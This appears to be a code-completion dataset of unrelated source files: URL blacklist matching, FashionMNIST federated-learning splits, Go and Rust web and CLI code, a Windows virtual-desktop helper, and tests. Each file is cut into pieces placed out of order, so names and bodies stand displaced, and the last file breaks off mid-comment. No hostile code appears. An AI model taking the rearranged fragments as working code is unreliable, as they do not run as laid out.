const re = new RegExp(`^${prefix}${str2RE(base)}${suffix}$`);
return (data) => {
// * matches all
if (rule === '*') return 1;
// exact match
if (rule === data) return 1;
const matches = data.match(re);
if (matches) {
const [, tldStr] = matches;
if (!tldStr) return 1;
const tldSuffix = tldStr.slice(1);
return tld.getPublicSuffix(tldSuffix) === tldSuffix;
}
return 0;
};
}
function pathMatcher(rule) {
const iHash = rule.indexOf('#');
let iQuery = rule.indexOf('?');
let strRe = str2RE(rule);
if (iQuery > iHash) iQuery = -1;
if (iHash < 0) {
if (iQuery < 0) strRe = `^${strRe}(?:[?#]|$)`;
else strRe = `^${strRe}(?:#|$)`;
}
const reRule = new RegExp(strRe);
return data => testRegExp(reRule, data);
}
function matchTester(rule) {
let test;
if (rule === '<all_urls>') {
test = () => true;
} else {
const ruleParts = rule.match(RE_MATCH_PARTS);
if (ruleParts) {
const matchHost = hostMatcher(ruleParts[2]);
const matchPath = pathMatcher(ruleParts[3]);
test = (url) => {
const parts = url.match(RE_MATCH_PARTS);
return !!ruleParts && !!parts
&& matchScheme(ruleParts[1], parts[1])
&& matchHost(parts[2])
&& matchPath(parts[3]);
};
} else {
// Ignore invalid match rules
test = () => false;
}
}
return { test };
}
function checkPrefix(prefix, rule) {
if (rule.startsWith(prefix)) {
return rule.slice(prefix.length).trim();
}
}
export function testBlacklist(url) {
let res = blCache[url];
if (res === undefined) {
const rule = blacklistRules.find(({ test }) => test(url));
if (rule) res = rule.reject;
updateBlacklistCache(url, res || false);
}
return res;
}
export function resetBlacklist(list) {
const rules = list == null ? getOption('blacklist') : list;
if (process.env.DEBUG) {
console.info('Reset blacklist:', rules);
}
// XXX compatible with {Array} list in v2.6.1-
blacklistRules = (Array.isArray(rules) ? rules : (rules || '').split('\n'))
.map((line) => {
const item = line.trim();
if (!item || item.startsWith('#')) return null;
/**
* @include and @match rules are added for people who need a whitelist.
*/
// @include
const includeRule = checkPrefix('@include ', item);
if (includeRule) {
return {
test: autoReg(includeRule).test,
reject: false,
};
}
// @match
const matchRule = checkPrefix('@match ', item);
if (matchRule) {
return {
test: matchTester(matchRule).test, | reject: false,
};
}
// @exclude
const excludeRule = checkPrefix('@exclude ', item);
if (excludeRule) {
return {
test: autoReg(excludeRule).test,
reject: true,
};
}
// domains
if (item.indexOf('/') < 0) {
return {
test: matchTester(`*://${item}/*`).test,
reject: true,
};
}
// @exclude-match
return {
test: matchTester(item).test,
reject: true,
};
})
.filter(Boolean);
blCache = {};
blCacheSize = 0;
}
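// A hypothetical blacklist illustrating the rule forms parsed above:
// @include /^https?:\/\/example\.com\// -> whitelist entry, compiled by autoReg as a RegExp
// @match *://docs.example.com/* -> whitelist entry, compiled by matchTester
// @exclude https://ads.example.com/* -> blacklist entry with wildcards
// tracker.example.net -> bare domain, expanded to *://tracker.example.net/*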
function updateBlacklistCache(key, value) {
blCache[key] = value;
blCacheSize += key.length;
if (blCacheSize > MAX_BL_CACHE_LENGTH) {
Object.keys(blCache)
.some((k) => {
blCacheSize -= k.length;
delete blCache[k];
// reduce the cache to 75% so that this function doesn't run too often.
return blCacheSize < MAX_BL_CACHE_LENGTH * 3 / 4;
});
}
} | |
train_script.py | # -*- coding: utf-8 -*-
import numpy as np
np.set_printoptions(precision=6, threshold=1e3)
import torch
from torchvision import datasets, transforms
import copy
import torch.nn as nn
from torch.utils.data import DataLoader
def mnist_iid(dataset, K, M):
dict_users, all_idxs = {}, [i for i in range(len(dataset))]
for i in range(M):
dict_users[i] = set(np.random.choice(all_idxs, int(K[i]), replace=False))
all_idxs = list(set(all_idxs) - dict_users[i])
return dict_users
def load_fmnist_iid(K):
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset_train = datasets.FashionMNIST('./data/FASHION_MNIST/', download=True, train=True, transform=transform)
dataset_test = datasets.FashionMNIST('./data/FASHION_MNIST/', download=True, train=False, transform=transform)
loader = DataLoader(dataset_train, batch_size=len(dataset_train), shuffle=False)
images, labels = next(iter(loader))
images, labels = images.numpy(), labels.numpy()
D_k = int(len(labels) / K)
train_images = []
train_labels = []
dict_users = {i: np.array([], dtype='int64') for i in range(K)}
all_idxs = np.arange(len(labels))
D = np.zeros(K)
for i in range(K):
dict_users[i] = set(np.random.choice(all_idxs, int(D_k), replace=False))
all_idxs = list(set(all_idxs) - dict_users[i])
train_images.append(images[list(dict_users[i])])
train_labels.append(labels[list(dict_users[i])])
D[i] = len(dict_users[i])
test_loader = DataLoader(dataset_test, batch_size=len(dataset_test), shuffle=True)
test_images, test_labels = next(iter(test_loader))
return train_images, train_labels, test_images.numpy(), test_labels.numpy(), D
def | (K, NUM_SHARDS):
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))
])
dataset_train = datasets.FashionMNIST('./data/FASHION_MNIST/', download=True, train=True, transform=transform)
dataset_test = datasets.FashionMNIST('./data/FASHION_MNIST/', download=True, train=False, transform=transform)
loader = DataLoader(dataset_train, batch_size=len(dataset_train), shuffle=False)
images, labels = next(iter(loader))
images, labels = images.numpy(), labels.numpy()
train_images = []
train_labels = []
# PART = 10
PART = 1
num_shards = K * NUM_SHARDS * PART
num_imgs = int(len(images) / num_shards)
idx_shard = [i for i in range(num_shards)]
dict_users = {i: np.array([], dtype='int64') for i in range(K)}
all_idxs = np.arange(len(labels))
# sort labels
idxs_labels = np.vstack((all_idxs, labels))
idxs_labels = idxs_labels[:, idxs_labels[1, :].argsort()]
all_idxs = idxs_labels[0, :]
idx_shard = idx_shard[::PART]
D = np.zeros(K)
for i in range(K):
rand_set = set(np.random.choice(idx_shard, NUM_SHARDS, replace=False))
idx_shard = list(set(idx_shard) - rand_set)
for rand in rand_set:
dict_users[i] = np.concatenate((dict_users[i], all_idxs[rand * num_imgs:(rand + 1) * num_imgs]), axis=0)
train_images.append(images[dict_users[i]])
train_labels.append(labels[dict_users[i]])
D[i] = len(dict_users[i])
test_loader = DataLoader(dataset_test, batch_size=len(dataset_test), shuffle=True)
test_images, test_labels = next(iter(test_loader))
return train_images, train_labels, test_images.numpy(), test_labels.numpy(), D
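# Worked example of the sharding above (numbers assumed): FashionMNIST has 60000
# training images, so with K=10 users and NUM_SHARDS=2 there are 20 label-sorted
# shards of 3000 images each; every user draws 2 shards without replacement, so
# most users only see one or two classes -- the usual label-skewed non-IID split.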
def local_update(setup, d, model1, train_images, train_labels, idx, batch_size):
initial_weight = copy.deepcopy(model1.state_dict())
model = copy.deepcopy(model1)
model.train()
loss_function = nn.CrossEntropyLoss()
optimizer = torch.optim.SGD(model.parameters(), lr=setup.lr, momentum=setup.momentum)
# optimizer = torch.optim.Adam(model.parameters(), lr=setup.lr)
epoch_loss = []
images = np.array_split(train_images[idx], len(train_images[idx]) // batch_size)
labels = np.array_split(train_labels[idx], len(train_labels[idx]) // batch_size)
for epoch in range(setup.local_ep):
batch_loss = []
for b_idx in range(len(images)):
model.zero_grad()
log_probs = model(torch.tensor(images[b_idx].copy(), device=setup.device))
local_loss = loss_function(log_probs, torch.tensor(labels[b_idx].copy(), device=setup.device))
local_loss.backward()
optimizer.step()
if setup.verbose == 2:
print('User: {}, Epoch: {}, Batch No: {}/{} Loss: {:.6f}'.format(idx,
epoch, b_idx + 1, len(images),
local_loss.item()))
batch_loss.append(local_loss.item())
epoch_loss.append(sum(batch_loss) / len(batch_loss))
copyw = copy.deepcopy(model.state_dict())
gradient2 = np.array([[]])
w2 = np.array([[]])
for item in copyw.keys():
gradient2 = np.hstack((gradient2, np.reshape((initial_weight[item] - copyw[item]).cpu().numpy(),
[1, -1]) / setup.lr))
w2 = np.hstack((w2, np.reshape((copyw[item] - initial_weight[item]).cpu().numpy(),
[1, -1])))
return w2, sum(epoch_loss) / len(epoch_loss), gradient2
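# Note on the return values above: gradient2 approximates the accumulated local
# gradient as (initial_weight - final_weight) / lr flattened into one row vector,
# and w2 is the matching model delta final_weight - initial_weight, presumably
# consumed by a server-side aggregation step outside this file.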
def test_model(model, setup, test_images, test_labels):
model.eval()
loss, total, correct = 0.0, 0.0, 0.0
images = torch.tensor(test_images).to(setup.device)
labels = torch.tensor(test_labels).to(setup.device)
outputs = model(images).to(setup.device)
loss_function = nn.CrossEntropyLoss()
batch_loss = loss_function(outputs, labels)
loss += batch_loss.item()
_, pred_labels = torch.max(outputs, 1)
pred_labels = pred_labels.view(-1)
correct += torch.sum(torch.eq(pred_labels, labels)).item()
total += len(labels)
accuracy = correct / total
if setup.verbose:
print('Average loss: {:.4f} \nAccuracy: {}/{} ({:.2f}%)\n'.format(
loss, int(correct), int(total), 100.0 * accuracy))
return accuracy, loss
| load_fmnist_noniid |
migration_up.go | /*
Copyright © 2020 NAME HERE <EMAIL ADDRESS>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package cmd
import (
migration "github.com/hermeschat/engine/db/migrations"
"github.com/hermeschat/engine/monitoring"
"github.com/spf13/cobra"
)
// upCmd represents the up command
var upCmd = &cobra.Command{
Use: "up",
Short: "Run all pending up migrations",
Long: ``,
Run: func(cmd *cobra.Command, args []string) {
m, err := migration.New()
if err != nil { | err = m.Up()
if err != nil {
monitoring.Logger().Fatalf("%s\n", err)
}
},
}
func init() {
migrationCmd.AddCommand(upCmd)
// Here you will define your flags and configuration settings.
// Cobra supports Persistent Flags which will work for this command
// and all subcommands, e.g.:
// upCmd.PersistentFlags().String("foo", "", "A help for foo")
// Cobra supports local flags which will only run when this command
// is called directly, e.g.:
// upCmd.Flags().BoolP("toggle", "t", false, "Help message for toggle")
}
|
monitoring.Logger().Fatalf("%s\n", err)
}
|
vdesk.py | import user32
import win32con
import ctypes
import collections
class VirtualDesktopException(Exception):
pass
class NoForegroundWindow(VirtualDesktopException):
pass
class VirtualDesktop(object):
def __init__(self):
self.window = []
self.removed_windows = []
def remove_foreground_window(self):
foreground_window = user32.GetForegroundWindow()
if user32.IsWindowVisible(foreground_window):
self.removed_windows.append(foreground_window)
user32.ShowWindow(foreground_window, win32con.SW_HIDE)
return foreground_window
raise NoForegroundWindow("No visible foreground window on this desktop.")
def add_window(self, window):
self.window.append(window)
def show(self):
self.removed_windows = []
for Window in self.window:
user32.ShowWindow(Window, win32con.SW_SHOW)
if len(self.window) > 0:
user32.SetForegroundWindow(self.window[-1])
def hide(self):
self.window = []
def enum_windows_proc(hWnd, lParam):
if not hWnd: return True
if not user32.IsWindowVisible(hWnd): return True
# Get Window Title
length = user32.SendMessage(hWnd, win32con.WM_GETTEXTLENGTH, 0, 0)
buffer = ctypes.create_unicode_buffer(length + 1)
if not user32.SendMessage(hWnd, win32con.WM_GETTEXT, length + 1, ctypes.byref(buffer)):
return True
if buffer.value != "Program Manager":
if hWnd not in self.removed_windows:
if hWnd == user32.GetForegroundWindow():
self.window.append(hWnd)
else:
self.window.insert(0, hWnd)
user32.ShowWindow(hWnd, win32con.SW_HIDE)
return True
user32.EnumWindows(enum_windows_proc, 0)
def __del__(self):
self.show()
class DesktopManager(object):
__Previous = 1
__Next = -1
def __init__(self, desktop_count=4):
self.Desktops = collections.deque([VirtualDesktop() for x in range(desktop_count)])
self.Index = collections.deque(range(desktop_count))
def _move(self, direction):
|
def _display_desktop(self, direction):
self.Desktops[0].hide()
self._move(direction)
self.Desktops[0].show()
def _move_window_to(self, direction, HideWindow=True):
foreground_window = self.Desktops[0].remove_foreground_window()
self._move(direction)
self.Desktops[0].add_window(foreground_window)
self._move(-direction)
def display_next(self):
self._display_desktop(self.__Next)
def display_previous(self):
self._display_desktop(self.__Previous)
def move_window_to_next_desktop(self):
self._move_window_to(self.__Next)
def move_window_to_previous_desktop(self):
self._move_window_to(self.__Previous)
def move_window_to_next_desktop_and_display(self):
self._move_window_to(self.__Next)
self._display_desktop(self.__Next)
def move_window_to_previous_desktop_and_display(self):
self._move_window_to(self.__Previous)
self._display_desktop(self.__Previous)
def get_current_desktop_number(self):
return self.Index[0]
def show_all_windows(self):
[Desktop.show() for Desktop in self.Desktops]
| self.Desktops.rotate(direction)
self.Index.rotate(direction) |
_showtickprefix.py | import _plotly_utils.basevalidators
class ShowtickprefixValidator(
_plotly_utils.basevalidators.EnumeratedValidator
):
def __init__(
self,
plotly_name='showtickprefix',
parent_name='layout.scene.zaxis',
**kwargs
):
super(ShowtickprefixValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='plot', | role='style',
values=['all', 'first', 'last', 'none'],
**kwargs
) |
|
test_on_policy_model.py | from collections import OrderedDict
import pytest
import gym
from gym import spaces
import torch
from torch import nn
import torch.nn.functional as F
from torch import distributions
import pytorch_lightning as pl
from lightning_baselines3.on_policy_models.on_policy_model import OnPolicyModel
class | (OnPolicyModel):
def __init__(self, *args, **kwargs):
super(DummyModel, self).__init__(*args, **kwargs)
if isinstance(self.action_space, spaces.Discrete):
self.p = nn.Parameter(torch.ones(1, self.action_space.n) * 0.5)
elif isinstance(self.action_space, spaces.Box):
self.p = nn.Parameter(torch.ones(1, self.action_space.shape[0] * 2) * 0.5)
else:
raise Exception('Incompatible environment action space')
def forward(self, x, **kwargs):
p = self.p.expand(x.shape[0], self.p.shape[-1])
if isinstance(self.action_space, spaces.Discrete):
dist = distributions.Categorical(probs=F.softmax(p, dim=1))
elif isinstance(self.action_space, spaces.Box):
p = torch.chunk(p, 2, dim=1)
dist = distributions.Normal(loc=p[0], scale=1 + p[1] ** 2)
return dist, torch.ones_like(x)[:, :1]
def predict(self, x, deterministic=True):
p = self.p.expand(x.shape[0], self.p.shape[-1])
if deterministic:
if isinstance(self.action_space, spaces.Discrete):
out = torch.max(p, dim=1)[1]
elif isinstance(self.action_space, spaces.Box):
out = torch.chunk(p, 2, dim=1)[0]
else:
if isinstance(self.action_space, spaces.Discrete):
out = distributions.Categorical(probs=F.softmax(p, dim=1)).sample()
elif isinstance(self.action_space, spaces.Box):
p = torch.chunk(p, 2, dim=1)
out = distributions.Normal(loc=p[0], scale=1 + p[1] ** 2).sample()
return out.cpu().numpy()
def training_step(self, x, batch_idx):
loss = self(x.observations)[0].entropy().mean()
self.log('loss', loss)
return loss
def configure_optimizers(self):
optimizer = torch.optim.Adam(self.parameters(), lr=1e-3)
return optimizer
@pytest.mark.parametrize("env_id", ["CartPole-v1", "MountainCar-v0", "MountainCarContinuous-v0"])
def test_on_policy_model(env_id):
"""
Check that environments integrated in Gym pass the test.
:param env_id: (str)
"""
model = DummyModel(
env_id,
eval_env=env_id,
buffer_length=512,
num_rollouts=1,
batch_size=32,
epochs_per_rollout=10,
num_eval_episodes=10,
gamma=0.9,
gae_lambda=0.95,
use_sde=False,
sde_sample_freq=-1,
verbose=1,
seed=1234)
trainer = pl.Trainer(max_epochs=2, terminate_on_nan=True)
trainer.fit(model)
| DummyModel |
get_sasa.py | from molsysmt import puw
from molsysmt.basic import convert, select, get
from molsysmt._private_tools._digestion import digest_engine, digest_target
import numpy as np
def | (molecular_system, target='atom', selection='all', frame_indices='all', syntaxis='MolSysMT',
engine='MDTraj'):
engine = digest_engine(engine)
target = digest_target(target)
if engine == 'MDTraj':
from mdtraj import shrake_rupley
tmp_item = convert(molecular_system, frame_indices=frame_indices, to_form='mdtraj.Trajectory')
sasa_array = shrake_rupley(tmp_item, mode='atom') # also takes probe_radius and n_sphere_points
if target=='atom':
if selection != 'all':
atom_indices = select(molecular_system, selection=selection, syntaxis=syntaxis)
sasa_array = sasa_array[:,atom_indices]
else:
sets_atoms = get(molecular_system, target=target, selection=selection, syntaxis=syntaxis, atom_index=True)
n_sets = len(sets_atoms)
n_frames = sasa_array.shape[0]
new_sasa_array = np.empty([n_frames, n_sets], dtype='float')
for ii in range(n_sets):
new_sasa_array[:,ii] = sasa_array[:,sets_atoms[ii].astype(int)].sum(axis=1)
sasa_array = new_sasa_array
sasa_array = puw.quantity(sasa_array, 'nm**2')
sasa_array = puw.standardize(sasa_array)
else:
raise NotImplementedError("Engine not implemented yet")
return sasa_array
| get_sasa |
hns_test.go | package hcsshimtest
import (
"os"
"testing"
"github.com/microsoft/hcsshim"
)
const (
NatTestNetworkName string = "GoTestNat"
NatTestEndpointName string = "GoTestNatEndpoint"
)
func TestMain(m *testing.M) {
os.Exit(m.Run())
}
func CreateTestNetwork() (*hcsshim.HNSNetwork, error) {
network := &hcsshim.HNSNetwork{
Type: "NAT",
Name: NatTestNetworkName,
Subnets: []hcsshim.Subnet{
hcsshim.Subnet{
AddressPrefix: "192.168.100.0/24",
GatewayAddress: "192.168.100.1",
},
},
}
return network.Create()
}
func TestEndpoint(t *testing.T) {
network, err := CreateTestNetwork()
if err != nil {
t.Error(err)
}
Endpoint := &hcsshim.HNSEndpoint{
Name: NatTestEndpointName,
}
Endpoint, err = network.CreateEndpoint(Endpoint)
if err != nil {
t.Error(err)
}
err = Endpoint.HostAttach(1)
if err != nil {
t.Error(err)
}
err = Endpoint.HostDetach()
if err != nil {
t.Error(err)
}
_, err = Endpoint.Delete()
if err != nil {
t.Error(err)
}
_, err = network.Delete()
if err != nil {
t.Error(err)
}
}
func TestEndpointGetAll(t *testing.T) {
_, err := hcsshim.HNSListEndpointRequest()
if err != nil {
t.Error(err)
}
}
func TestNetworkGetAll(t *testing.T) {
_, err := hcsshim.HNSListNetworkRequest("GET", "", "")
if err != nil {
t.Error(err)
}
}
func | (t *testing.T) {
network, err := CreateTestNetwork()
if err != nil {
t.Error(err)
}
_, err = network.Delete()
if err != nil {
t.Error(err)
}
}
| TestNetwork |
99-blackJack.py | '''
BLACKJACK HIGHEST
Basic Blackjack rules:
1. Cards with the numbers 2 through 10 have their face value.
2. Jacks, queens, and kings are valued at 10 points.
3. Aces can be 1 or 11 points.
Have the function BlackjackHighest(strArr) take the strArr parameter being passed
which will be an array of numbers and letters representing blackjack cards.
Numbers in the array will be written out.
So for example strArr may be ["two","three","ace","king"].
The full list of possibilities for
strArr is: two, three, four, five, six, seven, eight, nine, ten, jack, queen, king, ace.
Your program should output below, above, or blackjack, signifying whether your hand is under, over, or exactly at 21 points, followed by the highest card in your hand.
If the array contains an ace but your hand will go above 21, you must count the ace as a 1.
You must always try and stay below the 21 mark.
So using the array mentioned above, the output should be below king.
The ace is counted as a 1 in this example because if it wasn't you would be above the 21 mark.
Another example would be if strArr was ["four","ten","king"], the output here should be above king.
If you have a tie between a ten and a face card in your hand, return the face card as the "highest card".
If you have multiple face cards, the order of importance is jack, queen, king.
Examples
Input: ["four","ace","ten"]
Output: below ten
Input: ["ace","queen"]
Output: blackjack ace
'''
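# Worked example of the ace adjustment (illustration only): ["four","ace","ten"]
# scores 4 + 11 + 10 = 25 > 21, so the ace is re-counted as 1, giving
# 4 + 1 + 10 = 15 and the answer "below ten".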
def | (strArr):
cards_list = ['ace','two', 'three', 'four', 'five', 'six', 'seven', 'eight', 'nine', 'ten', 'jack', 'queen', 'king']
cards_values = [11,2,3,4,5,6,7,8,9,10,10,10,10]
hand_values = []
highest_card_rank = 0
ace_in_deck = False
for card in strArr:
index_of_card = cards_list.index(card)
if card == 'ace':
ace_in_deck = True
if index_of_card > highest_card_rank:
highest_card_rank = index_of_card
hand_values.append(cards_values[index_of_card])
total_hand = sum(hand_values)
if ace_in_deck and total_hand == 21:
return 'blackjack' + ' ' + 'ace'
elif not ace_in_deck and total_hand == 21:
return 'blackjack' + ' ' + cards_list[highest_card_rank]
elif ace_in_deck and total_hand > 21:
total_hand -= 10 # count the ace as 1 to stay at or below 21
if total_hand == 21:
return 'blackjack' + ' ' + cards_list[highest_card_rank]
elif total_hand < 21:
return 'below' + ' ' + cards_list[highest_card_rank]
else:
return 'above' + ' ' + cards_list[highest_card_rank]
elif ace_in_deck and total_hand < 21:
return 'below' + ' ' + 'ace'
elif total_hand > 21:
return 'above' + ' ' + cards_list[highest_card_rank]
else:
return 'below' + ' ' + cards_list[highest_card_rank]
# keep this function call here
print(BlackjackHighest(["ten","seven","three"]))
#Input: ["ten","seven","three"]
#Ans. Below ten
| BlackjackHighest |
mod.rs | //!
pub mod simulation; | //!
//! Cortex System simulation |
|
data_interop.rs | /* artifact: the requirements tracking tool made for developers
* Copyright (C) 2018 Rett Berg <@vitiral, [email protected]>
*
* The source code is Licensed under either of
*
* * Apache License, Version 2.0, ([LICENSE-APACHE](LICENSE-APACHE) or
* http://www.apache.org/licenses/LICENSE-2.0)
* * MIT license ([LICENSE-MIT](LICENSE-MIT) or
* http://opensource.org/licenses/MIT)
*
* at your option.
*
* Unless you explicitly state otherwise, any contribution intentionally submitted
* for inclusion in the work by you, as defined in the Apache-2.0 license, shall
* be dual licensed as above, without any additional terms or conditions.
* */
//! Interop Tests:
//! - #TST-read-artifact
#[macro_use]
extern crate expect_macro;
extern crate artifact_data;
extern crate artifact_lib;
extern crate artifact_test;
extern crate ergo;
use artifact_lib::*;
use artifact_test::{
assert_stuff_data, run_generic_interop_test, run_generic_interop_tests, INTEROP_TESTS_PATH,
};
use ergo::*;
/// This runs the interop tests for artifact-data.
fn run_interop_tests<P: AsRef<Path>>(test_base: P) {
run_generic_interop_tests(test_base, run_data_test);
}
fn run_data_test(project_path: PathDir) {
run_generic_interop_test(
project_path,
(),
read_project_shim,
modify_project_shim,
assert_stuff_data,
);
}
/// Simply calls `artifact_data::read_project(project_path)`
///
/// Used to satisfy the type requirements of `Fn` (cannot accept `AsRef`)
fn read_project_shim(
project_path: PathDir,
_state: (),
) -> Result<(lint::Categorized, Project), lint::Categorized> {
artifact_data::read_project(project_path)
}
/// Simply calls `artifact_data::modify_project(project_path, operations)`
///
/// Used to satisfy the type requirements of `Fn` (cannot accept `AsRef`)
fn | (
project_path: PathDir,
operations: Vec<ArtifactOp>,
_state: (),
) -> Result<(lint::Categorized, Project), ModifyError> {
// Do basic round-trip serialization
let result = expect!(round_ser!(Vec<ArtifactOp>, operations));
assert_eq!(operations, result);
// Do round trip through `*Ser` types
let operations_ser = expect!(round_ser!(Vec<ArtifactOpSer>, operations));
let result = expect!(round_ser!(Vec<ArtifactOp>, operations_ser));
artifact_data::modify_project(project_path, operations)
}
#[test]
/// #TST-read-artifact.empty
fn data_interop_project_empty() {
run_interop_tests(INTEROP_TESTS_PATH.join("empty"));
}
#[test]
/// #TST-read-artifact.source_only
fn data_interop_source_only() {
run_interop_tests(INTEROP_TESTS_PATH.join("source_only"));
}
#[test]
/// #TST-read-artifact.source_invalid
fn data_interop_source_invalid() {
run_interop_tests(INTEROP_TESTS_PATH.join("source_invalid"));
}
#[test]
/// #TST-read-artifact.design_only
fn data_interop_design_only() {
run_interop_tests(INTEROP_TESTS_PATH.join("design_only"));
}
#[test]
/// #TST-read-artifact.basic
fn data_interop_basic() {
run_interop_tests(INTEROP_TESTS_PATH.join("basic"));
}
#[test]
/// #TST-read-artifact.lints
fn data_interop_lints_error1() {
run_interop_tests(INTEROP_TESTS_PATH.join("lints"));
}
#[test]
fn data_interop_lints_error2() {
run_interop_tests(INTEROP_TESTS_PATH.join("lints2"));
}
| modify_project_shim |
target.py |
def digest_target(target):
| from .element import digest_element
return digest_element(target) |
|
dekorateur.py | def is_prime(n):
return n > 1 and all(n % i for i in range(2, n)) |
||
cm_shell_numpy.py | from __future__ import print_function
import os
from cmd3.console import Console
from cmd3.shell import command
from cloudmesh_numpy.command_numpy import command_numpy
class cm_shell_numpy:
def activate_cm_shell_numpy(self):
self.register_command_topic('mycommands', 'numpy')
@command
def | (self, args, arguments):
"""
::
Usage:
numpy NAME
tests via ping if the host with the given NAME is reachable
Arguments:
NAME Name of the machine to test
Options:
-v verbose mode
"""
# pprint(arguments)
if arguments["NAME"] is None:
Console.error("Please specify a host name")
else:
host = arguments["NAME"]
Console.info("trying to reach {0}".format(host))
status = command_numpy.status(host)
if status:
Console.info("machine " + host + " has been found. ok.")
else:
Console.error("machine " + host + " not reachable. error.")
pass
if __name__ == '__main__':
command = cm_shell_numpy()
command.do_numpy("iu.edu")
command.do_numpy("iu.edu-wrong")
| do_numpy |
Opengauss_Function_System_Table_Case0033.py | """
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : system table
Case Name : verify the columns and data types of system table PG_FOREIGN_TABLE
Description :
1. Inspect the structure of system table PG_FOREIGN_TABLE
2. Check whether each column and its data type are correct
Expect :
1. The structure of system table PG_FOREIGN_TABLE is displayed successfully
2. Each column matches its expected data type
History :
"""
import sys
import unittest
from yat.test import Node
from yat.test import macro
sys.path.append(sys.path[0] + "/../")
from testcase.utils.Logger import Logger
from testcase.utils.Common import Common
from testcase.utils.CommonSH import CommonSH
logger = Logger()
class IndexFileDamaged(unittest.TestCase):
def setUp(self):
logger.info('----------------this is setup-----------------------')
logger.info('--------------Opengauss_Function_System_Table_Case0033 starts execution--------------')
self.userNode = Node('dbuser')
self.DB_ENV_PATH = macro.DB_ENV_PATH
self.com = Common()
self.comsh = CommonSH('dbuser')
self.expect_result_dict = {'Column': ['ftrelid', 'ftserver', 'ftwriteonly', 'ftoptions'],
'Type': ['oid', 'oid', 'boolean', 'text[]']}
def test_Index_file_damaged(self):
logger.info('----------------------------inspect the table structure-----------------------------')
msg = self.comsh. | REIGN_TABLE')
logger.info(msg)
result_dict = self.com.format_sql_result(msg)
logger.info(result_dict)
del result_dict['Modifiers']
self.assertDictEqual(self.expect_result_dict, result_dict)
def tearDown(self):
logger.info('----------------this is tearDown-----------------------')
# no environment cleanup required
logger.info('-----------------------Opengauss_Function_System_Table_Case0033 execution finished-----------------------------')
| execut_db_sql('\d PG_FO |
requiredFields.validation.ts | import MissingParamError from '../../../errors/MissingParamError'
import { Validator } from '../validator.protocol'
export class | implements Validator {
constructor (private readonly fieldName: string) {}
validate (input: any): Error | undefined {
if (!input[this.fieldName]) {
return new MissingParamError(this.fieldName)
}
}
}
| RequiredFieldsValidation |
mod.rs | use crate::api_service::Data;
use actix_web::{delete, get, post, web, HttpResponse, Responder};
#[get("/get-all")]
async fn get_all_json(app_data: web::Data<crate::AppState>) -> impl Responder {
let action = app_data.service_manager.api.get_json();
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
}
#[get("/get-by/{param}")]
async fn get_user_email(app_data: web::Data<crate::AppState>, param: web::Path<String>) -> impl Responder {
let action = app_data.service_manager.api.get_by(¶m);
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
}
#[post("/add")]
async fn add_user(app_data: web::Data<crate::AppState>, data: web::Json<Data>) -> impl Responder |
#[post("/update/{param}")]
async fn update_user(app_data: web::Data<crate::AppState>, data: web::Json<Data>, param: web::Path<String>) -> impl Responder {
let action = app_data.service_manager.api.update(&data, ¶m);
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result.modified_count),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
}
#[delete("/delete")]
async fn delete_user(app_data: web::Data<crate::AppState>, data: web::Json<Data>) -> impl Responder {
let action = app_data.service_manager.api.delete(&data.title);
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result.deleted_count),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
}
// function that will be called on new Application to configure routes for this module
pub fn init(cfg: &mut web::ServiceConfig) {
cfg.service(get_user_email);
cfg.service(add_user);
cfg.service(update_user);
cfg.service(delete_user);
cfg.service(get_all_json);
}
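// Hypothetical wiring from main (names assumed, not part of this module):
// HttpServer::new(move || App::new().data(app_state.clone()).configure(init))
// would register the five handlers above on the application.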
| {
let action = app_data.service_manager.api.create(&data);
let result = web::block(move || action).await;
match result {
Ok(result) => HttpResponse::Ok().json(result.inserted_id),
Err(e) => {
println!("Error while getting, {:?}", e);
HttpResponse::InternalServerError().finish()
}
}
} |
random_table.rs | use rltk::RandomNumberGenerator;
pub struct RandomEntry {
name: String,
weight: i32,
}
| RandomEntry {
name: name.to_string(),
weight,
}
}
}
#[derive(Default)]
pub struct RandomTable {
entries: Vec<RandomEntry>,
total_weight: i32,
}
impl RandomTable {
pub fn new() -> RandomTable {
RandomTable {
entries: Vec::new(),
total_weight: 0,
}
}
pub fn add<S: ToString>(mut self, name: S, weight: i32) -> RandomTable {
if weight > 0 {
self.total_weight += weight;
self.entries
.push(RandomEntry::new(name.to_string(), weight));
}
self
}
pub fn roll(&self, rng: &mut RandomNumberGenerator) -> String {
if self.total_weight == 0 {
return "None".to_string();
}
let mut roll = rng.roll_dice(1, self.total_weight) - 1;
// "If the roll is below the weight, it returns it - otherwise, it
// reduces the roll by the weight and tests the next entry.
// This gives a chance equal to the relative weight of the
// entry for any given item in the table."
for entry in &self.entries {
if roll < entry.weight {
return entry.name.clone();
}
roll -= entry.weight;
}
"None".to_string()
}
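// Usage sketch with assumed weights: RandomTable::new().add("Goblin", 10).add("Orc", 4)
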